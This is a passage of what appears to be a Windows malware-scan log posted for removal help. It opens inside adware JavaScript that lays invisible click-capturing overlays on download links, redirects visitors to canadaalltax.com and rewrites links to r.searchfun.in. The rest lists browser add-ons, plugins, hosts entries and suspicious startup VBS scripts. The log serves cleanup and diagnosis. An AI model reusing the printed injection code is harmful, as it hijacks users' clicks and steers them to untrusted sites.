d=document.createElement(\"div\");d.style.position=\"absolute\";d.style.top=\"0\";d.style.left=\"0\";d.style.width=\"100%\";d.style.height=\"100%\";d.style.zIndex=\"9999\";d.style.cursor=\"pointer\";b.parentNode.appendChild(d)};if(-1<document.location.href.indexOf(\"necraftdl.com/download.ph\")){var a=document.getElementById(\"downloadpage\"),b=a.getElementsByTagName(\"a\")[0],d=document.createElement(\"div\");d.style.position=\"absolute\";d.style.width=\"100%\";d.style.height=\"34px\";d.style.left=\"0\";d.style.cursor=\"pointer\";d.style.zIndex=9999;b.parentNode.insertBefore(d,b.previousSibling)} if(-1<document.location.href.indexOf(\"necraftdl.com\"))for(var i=0;i<document.links.length;i++){var link=document.links[i];if(\".exe\"==link.href.substr(-4)){var p=link.parentNode;p.style.position=\"relative\";d=document.createElement(\"div\");d.style.position=\"absolute\";d.style.top=0;d.style.left=0;d.style.width=\"100%\";d.style.height=\"100%\";d.style.cursor=\"pointer\";d.style.zIndex=9999;p.appendChild(d)}};;(function(){try{var b=\"gonetwork.eu performancerevenues.com adtransfer adk2.com timehare clkads.com adcash xtendmedia.com cpxinteractive media-servers directrev doubleclick brealtime.com adnxs.com yieldmanager jsopen yieldads adserverplus clicksor exoclick.com vitalads zedo.com mshft pop.billi mediawhite edomz getjs adjuggler realpopbid bestadbid directdisplayad displayadfeed adorika displayadfeed akamaihd.net/ssa/ trusted-serving tusfiles clkmon.c minecraftdl\".split(\" \");for(i=0;i<b.length;i++){var a=location.href + (document.title?document.title.toLowerCase():\"z\");if(document.referrer&&-1<document.referrer.indexOf(b[i])&&(-1<a.indexOf(\"download\")||-1<a.indexOf(\"convert\")||-1<window.self.location.href.indexOf(\"babylon\")||-1<window.self.location.href.indexOf(\"se Update Go\")||-1<window.self.location.href.indexOf(\"ilivid\")||-1<window.self.location.href.indexOf(\"download\")||-1<a.indexOf(\"regclean\")||-1<a.indexOf(\"etype\")||-1<a.indexOf(\"diction\")||-1<a.indexOf(\"my-uq\")||-1<a.indexOf(\"ftalk\")||-1<a.indexOf(\"pcspeedmaximizer\")||-1<a.indexOf(\"kingtransl\")||-1<a.indexOf(\"jsopen\")||-1<a.indexOf(\"7-zip\")||-1<a.indexOf(\"boost pc\")||-1<a.indexOf(\"computer slow\")||-1<a.indexOf(\"7-update14\")||-1<a.indexOf(\"player\")) || location.hostname.indexOf('jsopen.net')>-1){var channel=99;if(window.onbeforeunload){window.onbeforeunload=null;channel=98};location.href=\"http://canadaalltax.com/e/?f=qTgKrjCFvTsGpc5FqTmXrjnErTwFqHs4rn%3D%3D&eid=15&hid=0&pid=34&ch=\"+channel+\"&s=px.pluginh&r=\"+Math.random();break}}}catch(d){}})();if(-1==window.self.location.hostname.indexOf('mail.')){for(i=0;5>i;i++)window.setTimeout(function(){document.getElementById('c2soffer')&&document.getElementById('c2soffer').parentNode.removeChild(document.getElementById('c2soffer'))},100*i);var c2soffer=document.querySelectorAll('div.c2soffer');if(c2soffer && c2soffer.length && c2soffer.length>0)for(var i=0;i<c2soffer.length;i++)c2soffer[i].parentNode.removeChild(c2soffer[i]);document.getElementById('w3uyh7g6h7f5x')&&document.getElementById('w3uyh7g6h7f5x').parentNode.removeChild(document.getElementById('w3uyh7g6h7f5x'))};if(window.top==window.self&&\"undefined\"!=typeof addEventListener&&5>parseInt(\"562.46\")&&-1==document.cookie.indexOf(\"vdsknj4th4un\")){var zytd=function(a){try{if(\"a\"==a.target.tagName.toLowerCase()&&\"\"==a.target.innerHTML&&a.target.getAttribute(\"href\")&&-1==a.target.getAttribute(\"href\").indexOf(window.self.location.hostname)){a.target.setAttribute(\"href\",\"http://r.searchfun.in/?g=Azm9CdOLv6D6DG4ZhyqZC7YKg70Jv6qTCMVEDc0EgeqRg6bJvNbOCd0GojsGrjUErchXCMhMofb5vNbIDeDPBMY%3D\");var b=new Date;b.setHours(b.getHours()+5);document.cookie=\"vdsknj4th4un=1;expires=\"+b.toUTCString();document.getElementsByTagName(\"body\")[0].removeEventListener(\"click\",zytd)}}catch©{}};try{document.getElementsByTagName(\"body\")[0].addEventListener(\"click\",zytd)}catch(e){}};})();(function(){void(0)})()");
FF - prefs.js..extensions.enabledAddons: infoatoms%40infoatoms.com:1.5.0.0
FF - prefs.js..extensions.enabledAddons: avg%40toolbar:18.1.0.443
FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:29.0.1
FF - prefs.js..network.proxy.type: 0
FF - user.js - File not found
 
FF:64bit: - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF64_13_0_0_214.dll File not found
FF:[b]64bit:
- HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.11.2: C:\Windows\system32\npDeployJava1.dll (Oracle Corporation)
FF:[b]64bit:
- HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.11.2: C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF:[b]64bit:
- HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found
FF:[b]64bit:
- HKLM\Software\MozillaPlugins\@wacom.com/wtPlugin,version=2.1.0.2: C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll (Wacom)
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_13_0_0_214.dll ()
FF - HKLM\Software\MozillaPlugins\@adobe.com/ShockwavePlayer: C:\Windows\SysWOW64\Adobe\Director\np32dsw_1211151.dll (Adobe Systems, Inc.)
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=:  File not found
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF - HKLM\Software\MozillaPlugins\@avg.com/AVG SiteSafety plugin,version=11.0.0.1,application/x-avg-sitesafety-plugin: C:\Program Files (x86)\Common Files\AVG Secure Search\SiteSafetyInstaller\18.1.0\\npsitesafety.dll File not found
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.7.2: C:\Windows\SysWOW64\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@mcafee.com/McAfeeMssPlugin: C:\Program Files\McAfee Security Scan\3.8.130\npMcAfeeMss.dll (McAfee, Inc.)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=16.4.3503.0728: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@nvidia.com/3DVision: C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation)
FF - HKLM\Software\MozillaPlugins\@nvidia.com/3DVisionStreaming: C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files (x86)\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files (x86)\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@wacom.com/wtPlugin,version=2.1.0.2: C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll (Wacom)
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKCU\Software\MozillaPlugins\@unity3d.com/UnityPlayer,version=1.0: C:\Users\COCHRAN\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll (Unity Technologies ApS)
FF - HKCU\Software\MozillaPlugins\wacom.com/WacomTabletPlugin: C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll (Wacom)
 
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\extensions\\[email protected]: C:\ProgramData\AVG Secure Search\FireFoxExt\18.1.0.443 [2014/04/27 17:22:50 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\extensions\\[email protected]: C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3 [2013/01/05 23:55:35 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\extensions\\[email protected]: C:\Program Files (x86)\Mozilla Firefox\extensions\[email protected] [2013/02/06 23:36:22 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 29.0.1\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components [2013/05/24 08:43:13 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 29.0.1\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins
FF - HKEY_CURRENT_USER\software\mozilla\Firefox\Extensions\\[email protected]: C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3 [2013/01/05 23:55:35 | 000,000,000 | ---D | M]
 
[2012/07/01 21:11:37 | 000,000,000 | ---D | M] (No name found) -- C:\Users\COCHRAN\AppData\Roaming\mozilla\Extensions
[2014/05/01 13:16:20 | 000,000,000 | ---D | M] (No name found) -- C:\Users\COCHRAN\AppData\Roaming\mozilla\Firefox\Profiles\5afpu397.default\extensions
[2012/11/21 12:43:22 | 000,000,000 | ---D | M] (blekko search bar) -- C:\Users\COCHRAN\AppData\Roaming\mozilla\Firefox\Profiles\5afpu397.default\extensions\{636a1cf4-2af8-462e-ba54-5f0d75ad6eef}
[2012/11/21 12:47:52 | 000,000,000 | ---D | M] (Download and Sa) -- C:\Users\COCHRAN\AppData\Roaming\mozilla\Firefox\Profiles\5afpu397.default\extensions\[email protected]
[2013/12/10 18:36:17 | 000,000,000 | ---D | M] (We-Care App) -- C:\Users\COCHRAN\AppData\Roaming\mozilla\Firefox\Profiles\5afpu397.default\extensions\[email protected]
[2014/04/17 11:32:20 | 000,111,249 | ---- | M] () (No name found) -- C:\Users\COCHRAN\AppData\Roaming\mozilla\firefox\profiles\5afpu397.default\extensions\[email protected]
[2014/05/01 13:16:20 | 000,957,880 | ---- | M] () (No name found) -- C:\Users\COCHRAN\AppData\Roaming\mozilla\firefox\profiles\5afpu397.default\extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi
[2014/06/06 18:40:57 | 000,001,014 | ---- | M] () -- C:\Users\COCHRAN\AppData\Roaming\mozilla\firefox\profiles\5afpu397.default\searchplugins\trovi-search.xml
[2014/03/02 01:08:51 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\extensions
[2013/02/06 23:36:22 | 000,000,000 | ---D | M] (InfoAtoms) -- C:\Program Files (x86)\Mozilla Firefox\extensions\[email protected]
[2014/04/20 01:10:08 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions
[2014/05/11 22:26:59 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
[2014/04/27 17:22:50 | 000,000,000 | ---D | M] (AVG Security Toolbar) -- C:\PROGRAMDATA\AVG SECURE SEARCH\FIREFOXEXT\18.1.0.443
 
========== Chrome  ==========
 
CHR - default_search_provider:  (Enabled)
CHR - default_search_provider: search_url =
CHR - default_search_provider: suggest_url = http://suggest.secci...={searchTerms},
CHR - plugin: Remoting Viewer (Enabled) = internal-remoting-viewer
CHR - plugin: Native Client (Enabled) = C:\Program Files (x86)\Google\Chrome\Application\35.0.1916.114\ppGoogleNaClPluginChrome.dll
CHR - plugin: Chrome PDF Viewer (Enabled) = C:\Program Files (x86)\Google\Chrome\Application\35.0.1916.114\pdf.dll
CHR - plugin: Shockwave Flash (Enabled) = C:\Program Files (x86)\Google\Chrome\Application\35.0.1916.114\gcswf32.dll
CHR - plugin: AVG SiteSafety plugin (Enabled) = C:\Program Files (x86)\Common Files\AVG Secure Search\SiteSafetyInstaller\11.1.0\\npsitesafety.dll
CHR - plugin: Google Update (Enabled) = C:\Program Files (x86)\Google\Update\1.3.21.111\npGoogleUpdate3.dll
CHR - plugin: NVIDIA 3D Vision (Enabled) = C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll
CHR - plugin: NVIDIA 3D VISION (Enabled) = C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll
CHR - plugin: Java™ Platform SE 7 U5 (Enabled) = C:\Program Files (x86)\Oracle\JavaFX 2.1 Runtime\bin\plugin2\npjp2.dll
CHR - plugin: Java Deployment Toolkit 7.0.50.255 (Enabled) = C:\Windows\SysWOW64\npDeployJava1.dll
CHR - Extension: No name found = C:\Users\COCHRAN\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\
CHR - Extension: No name found = C:\Users\COCHRAN\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_1\
CHR - Extension: No name found = C:\Users\COCHRAN\AppData\Local\Google\Chrome\User Data\Default\Extensions\hhbgpoakplhahbklhkcfbpicgjcaoglk\1.5.0.0_0\
CHR - Extension: No name found = C:\Users\COCHRAN\AppData\Local\Google\Chrome\User Data\Default\Extensions\ippkomaaonokjnfjoikaemidanojkfmm\1.0.0.24_0\
CHR - Extension: No name found = C:\Users\COCHRAN\AppData\Local\Google\Chrome\User Data\Default\Extensions\ippkomaaonokjnfjoikaemidanojkfmm\1.0.0.36_0\
CHR - Extension: No name found = C:\Users\COCHRAN\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl\6.13.0.13771_0\
CHR - Extension: No name found = C:\Users\COCHRAN\AppData\Local\Google\Chrome\User Data\Default\Extensions\mhfjfmjcnocilkmbbbfncofpdjcfmiln\7.1_0\
CHR - Extension: No name found = C:\Users\COCHRAN\AppData\Local\Google\Chrome\User Data\Default\Extensions\mhfjfmjcnocilkmbbbfncofpdjcfmiln\7.1_1\
CHR - Extension: No name found = C:\Users\COCHRAN\AppData\Local\Google\Chrome\User Data\Default\Extensions\ndibdjnfmopecpmkdieinmbadjfpblof\17.0.1.12_0\
CHR - Extension: No name found = C:\Users\COCHRAN\AppData\Local\Google\Chrome\User Data\Default\Extensions\ndkhncnongaclekkbelchmeafffimifj\1.18.13_0\crossrider
CHR - Extension: No name found = C:\Users\COCHRAN\AppData\Local\Google\Chrome\User Data\Default\Extensions\ndkhncnongaclekkbelchmeafffimifj\1.18.13_0\
CHR - Extension: No name found = C:\Users\COCHRAN\AppData\Local\Google\Chrome\User Data\Default\Extensions\ndkhncnongaclekkbelchmeafffimifj\1.18.13_1\crossrider
CHR - Extension: No name found = C:\Users\COCHRAN\AppData\Local\Google\Chrome\User Data\Default\Extensions\ndkhncnongaclekkbelchmeafffimifj\1.18.13_1\
CHR - Extension: No name found = C:\Users\COCHRAN\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.4.11_0\
 
O1 HOSTS File: ([2013/06/17 11:49:36 | 000,449,637 | R--- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O1 - Hosts: 127.0.0.1    www.007guard.com
O1 - Hosts: 127.0.0.1    007guard.com
O1 - Hosts: 127.0.0.1    008i.com
O1 - Hosts: 127.0.0.1    www.008k.com
O1 - Hosts: 127.0.0.1    008k.com
O1 - Hosts: 127.0.0.1    www.00hq.com
O1 - Hosts: 127.0.0.1    00hq.com
O1 - Hosts: 127.0.0.1    010402.com
O1 - Hosts: 127.0.0.1    www.032439.com
O1 - Hosts: 127.0.0.1    032439.com
O1 - Hosts: 127.0.0.1    www.0scan.com
O1 - Hosts: 127.0.0.1    0scan.com
O1 - Hosts: 127.0.0.1    www.1000gratisproben.com
O1 - Hosts: 127.0.0.1    1000gratisproben.com
O1 - Hosts: 127.0.0.1    1001namen.com
O1 - Hosts: 127.0.0.1    www.1001namen.com
O1 - Hosts: 127.0.0.1    100888290cs.com
O1 - Hosts: 127.0.0.1    www.100888290cs.com
O1 - Hosts: 127.0.0.1    www.100sexlinks.com
O1 - Hosts: 127.0.0.1    100sexlinks.com
O1 - Hosts: 127.0.0.1    www.10sek.com
O1 - Hosts: 127.0.0.1    10sek.com
O1 - Hosts: 127.0.0.1    www.1-2005-search.com
O1 - Hosts: 127.0.0.1    1-2005-search.com
O1 - Hosts: 127.0.0.1    www.123fporn.info
O1 - Hosts: 15435 more lines...
O2:[b]64bit:
- BHO: (AVG Do Not Track) - {31332EEF-CB9F-458F-AFEB-D30E9A66B6BA} - C:\Program Files (x86)\AVG\AVG2012\avgdtiea.dll File not found
O2:[b]64bit:
- BHO: (AVG Safe Search) - {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} - C:\Program Files (x86)\AVG\AVG2012\avgssiea.dll File not found
O2:[b]64bit:
- BHO: (Java™ Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
O2:[b]64bit:
- BHO: (Google Toolbar Helper) - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
O2:[b]64bit:
- BHO: (Skype add-on for Internet Explorer) - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\SkypeIEPlugin.dll (Microsoft Corporation)
O2:[b]64bit:
- BHO: (Java™ Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
O2:[b]64bit:
- BHO: (PowerInbox) - {EF7AED5F-0C26-4820-A570-7DA8B6D93F4A} - C:\Program Files (x86)\PowerInbox\PowerInbox\PowerInboxBHO64.dll (PowerInbox Inc.)
O2:[b]64bit:
- BHO: (Hotspot Shield Class) - {F9E4A054-E9B1-4BC3-83A3-76A1AE736170} - C:\Program Files (x86)\Hotspot Shield\HssIE\HssIE_64.dll (AnchorFree Inc.)
O2 - BHO: (MSS+ Identifier) - {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} - C:\Program Files\McAfee Security Scan\3.8.130\McAfeeMSS_IE.dll (McAfee, Inc.)
O2 - BHO: (Giant Savings) - {11111111-1111-1111-1111-110011441179} - C:\Program Files (x86)\Giant Savings\Giant Savings.dll (215 Apps)
O2 - BHO: (no name) - {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} - No CLSID value found.
O2 - BHO: (Download and Sa Class) - {45CE3736-CA44-E3E0-4A7C-3AA5ABAE7037} - C:\ProgramData\Download and Sa\50ad1580176fa.ocx ()
O2 - BHO: (Spybot-S&D IE Protection) - {53707962-6F74-2D53-2644-206D7942484F} - C:\Program Files (x86)\Spybot - Search & Destroy\SDHelper.dll (Safer Networking Limited)
O2 - BHO: (blekko search bar) - {636a1cf4-2af8-462e-ba54-5f0d75ad6eef} - C:\Program Files (x86)\blekkotb_026\blekkotb_019X.dll ()
O2 - BHO: (AVG Security Toolbar) - {95B7759C-8C7F-4BF1-B163-73684A933233} - C:\Program Files (x86)\AVG Secure Search\18.0.0.248\AVG Secure Search_toolbar.dll (AVG Secure Search)
O2 - BHO: (Skype Browser Helper) - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O2 - BHO: (no name) - {D4027C7F-154A-4066-A1AD-4243D8127440} - No CLSID value found.
O2 - BHO: (WeCareReminder Class) - {D824F0DE-3D60-4F57-9EB1-66033ECD8ABB} - C:\ProgramData\WeCareReminder\IEHelperv2.5.0.dll (We-Care.com)
O2 - BHO: (PowerInbox) - {EF7AED5F-0C26-4820-A570-7DA8B6D93F4A} - C:\Program Files (x86)\PowerInbox\PowerInbox\PowerInboxBHO.dll (PowerInbox Inc.)
O2 - BHO: (Hotspot Shield Class) - {F9E4A054-E9B1-4BC3-83A3-76A1AE736170} - C:\Program Files (x86)\Hotspot Shield\HssIE\HssIE.dll (AnchorFree Inc.)
O3:[b]64bit:
- HKLM\..\Toolbar: (Google Toolbar) - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
O3 - HKLM\..\Toolbar: (blekko search bar) - {636a1cf4-2af8-462e-ba54-5f0d75ad6eef} - C:\Program Files (x86)\blekkotb_026\blekkotb_019X.dll ()
O3 - HKLM\..\Toolbar: (AVG Security Toolbar) - {95B7759C-8C7F-4BF1-B163-73684A933233} - C:\Program Files (x86)\AVG Secure Search\18.0.0.248\AVG Secure Search_toolbar.dll (AVG Secure Search)
O3 - HKLM\..\Toolbar: (no name) - {D4027C7F-154A-4066-A1AD-4243D8127440} - No CLSID value found.
O3:[b]64bit:
- HKU\S-1-5-21-1681504733-1289828258-2380439542-1000\..\Toolbar\WebBrowser: (Google Toolbar) - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
O4:[b]64bit:
- HKLM..\Run: [AdobeAAMUpdater-1.0] C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe (Adobe Systems Incorporated)
O4:[b]64bit:
- HKLM..\Run: [Logitech Download Assistant] C:\Windows\SysNative\LogiLDA.dll (Logitech, Inc.)
O4:[b]64bit:
- HKLM..\Run: [MSC] c:\Program Files\Microsoft Security Client\msseces.exe (Microsoft Corporation)
O4 - HKLM..\Run: [AdobeCS6ServiceManager] C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe (Adobe Systems Incorporated)
O4 - HKLM..\Run: [Anti-phishing Domain Advisor] C:\ProgramData\Anti-phishing Domain Advisor\visicom_antiphishing.exe (Visicom Media Inc. (Powered by Panda Security))
O4 - HKLM..\Run: [APSDaemon] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.)
O4 - HKLM..\Run: [AVG_UI] C:\Program Files (x86)\AVG\AVG2014\avgui.exe (AVG Technologies CZ, s.r.o.)
O4 - HKLM..\Run: [BambooCore] C:\Program Files (x86)\Bamboo Dock\BambooCore.exe ()
O4 - HKLM..\Run: [HDAudDeck] C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDeck.exe (VIA)
O4 - HKLM..\Run: [InstaLAN] C:\Program Files (x86)\Belkin\Router Setup and Monitor\BelkinRouterMonitor.exe (Affinegy, Inc.)
O4 - HKLM..\Run: [LifeCam] C:\Program Files (x86)\Microsoft LifeCam\LifeExp.exe (Microsoft Corporation)
O4 - HKLM..\Run: [PureLeads Tray] C:\Program Files (x86)\PureLeads\PureLeadsTray.exe (PureLeads)
O4 - HKLM..\Run: [PWRISOVM.EXE] C:\Program Files\PowerISO\PWRISOVM.EXE (Power Software Ltd)
O4 - HKLM..\Run: [SwitchBoard] C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe (Adobe Systems Incorporated)
O4 - HKLM..\Run: [vProt] C:\Program Files (x86)\AVG Secure Search\vprot.exe ()
O4 - HKU\S-1-5-19..\Run: [Sidebar] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe (Microsoft Corporation)
O4 - HKU\S-1-5-20..\Run: [Sidebar] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe (Microsoft Corporation)
O4 - HKU\S-1-5-21-1681504733-1289828258-2380439542-1000..\Run: [ApplePhotoStreams] C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe (Apple Inc.)
O4 - HKU\S-1-5-21-1681504733-1289828258-2380439542-1000..\Run: [DAEMON Tools Lite] C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe (Disc Soft Ltd)
O4 - HKU\S-1-5-21-1681504733-1289828258-2380439542-1000..\Run: [Desura] C:\Program Files (x86)\Desura\desura.exe (Desura Pty Ltd)
O4 - HKU\S-1-5-21-1681504733-1289828258-2380439542-1000..\Run: [GoogleDriveSync] C:\Program Files (x86)\Google\Drive\googledrivesync.exe (Google)
O4 - HKU\S-1-5-21-1681504733-1289828258-2380439542-1000..\Run: [iCloudServices] C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe (Apple Inc.)
O4 - HKU\S-1-5-21-1681504733-1289828258-2380439542-1000..\Run: [SpybotSD TeaTimer] C:\Program Files (x86)\Spybot - Search & Destroy\TeaTimer.exe (Safer-Networking Ltd.)
O4 - HKU\S-1-5-21-1681504733-1289828258-2380439542-1000..\Run: [Steam] C:\Program Files (x86)\Steam\Steam.exe (Valve Corporation)
O4 - HKU\S-1-5-21-1681504733-1289828258-2380439542-1000..\Run: [uTorrent] C:\Users\COCHRAN\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc.)
O4 - HKU\S-1-5-21-1681504733-1289828258-2380439542-1000..\Run: [Weather] C:\Program Files (x86)\AWS\WeatherBug\Weather.exe (AWS Convergence Technologies, Inc.)
O4 - HKU\S-1-5-21-1681504733-1289828258-2380439542-1000..\Run: [Win Update Service] C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe (Microsoft Corporation)
O4 - HKU\S-1-5-21-1681504733-1289828258-2380439542-1003..\Run: [AVG-Secure-Search-Update_JUNE2013_TB] "C:\Program Files (x86)\AVG Secure Search\AVG-Secure-Search-Update_JUNE2013_TB.exe"  /PROMPT /CMPID=JUNE2013_TB File not found
O4 - HKU\S-1-5-21-1681504733-1289828258-2380439542-1003..\Run: [Sidebar] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe (Microsoft Corporation)
O4 - HKU\S-1-5-19..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found
O4 - HKU\S-1-5-20..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found
O4 - HKU\S-1-5-21-1681504733-1289828258-2380439542-1000..\RunOnce: [2v57a52ep7] C:\Users\COCHRAN\2v57a52ep7\74727.vbs ()
O4 - HKU\S-1-5-21-1681504733-1289828258-2380439542-1000..\RunOnce: [d5g5rz7tw8n] C:\Users\COCHRAN\d5g5rz7tw8n\13763.vbs ()
O4 - HKU\S-1-5-21-1681504733-1289828258-2380439542-1000..\RunOnce: [kr2759867s7] C:\Users\COCHRAN\kr2759867s7\99489.vbs ()
O4 - HKU\S-1-5-21-1681504733-1289828258-2380439542-1003..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found
O4 - Startup: C:\Users\COCHRAN\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start.lnk = C:\Users\COCHRAN\2v57a52ep7\74727.vbs ()
O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Activities present
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O9:[b]64bit:
- Extra Button: AVG Do Not Track - {68BCFFE1-A2DA-4B40-9068-87ECBFC19D16} - C:\Program Files (x86)\AVG\AVG2012\avgdtiea.dll File not found
O9:[b]64bit:
- Extra Button: Skype Click to Call - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\SkypeIEPlugin.dll (Microsoft Corporation)
O9 - Extra Button: Skype Click to Call - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O9 - Extra 'Tools' menuitem : Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\Program Files (x86)\Spybot - Search & Destroy\SDHelper.dll (Safer Networking Limited)
O10:[b]64bit:
- NameSpace_Catalog5\Catalog_Entries64\000000000007 [] - C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.)
O10:[b]64bit:
- Protocol_Catalog9\Catalog_Entries64\000000000001 - C:\Windows\SysNative\plsapp64.dll (Sendori)
O10:[b]64bit:
- Protocol_Catalog9\Catalog_Entries64\000000000002 - C:\Windows\SysNative\plsapp64.dll (Sendori)
O10:[b]64bit:
- Protocol_Catalog9\Catalog_Entries64\000000000003 - C:\Windows\SysNative\plsapp64.dll (Sendori)
O10:[b]64bit:
- Protocol_Catalog9\Catalog_Entries64\000000000004 - C:\Windows\SysNative\plsapp64.dll (Sendori)
O10:[b]64bit:
- Protocol_Catalog9\Catalog_Entries64\000000000015 - C:\Windows\SysNative\plsapp64.dll (Sendori)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000007 [] - C:\Program Files (x86)\Bonjour\mdnsNSP.dll (Apple Inc.)
O10 - Protocol_Catalog9\Catalog_Entries\000000000001 - C:\Windows\SysWow64\plsapp.dll (Sendori)
O10 - Protocol_Catalog9\Catalog_Entries\000000000002 - C:\Windows\SysWow64\plsapp.dll (Sendori)
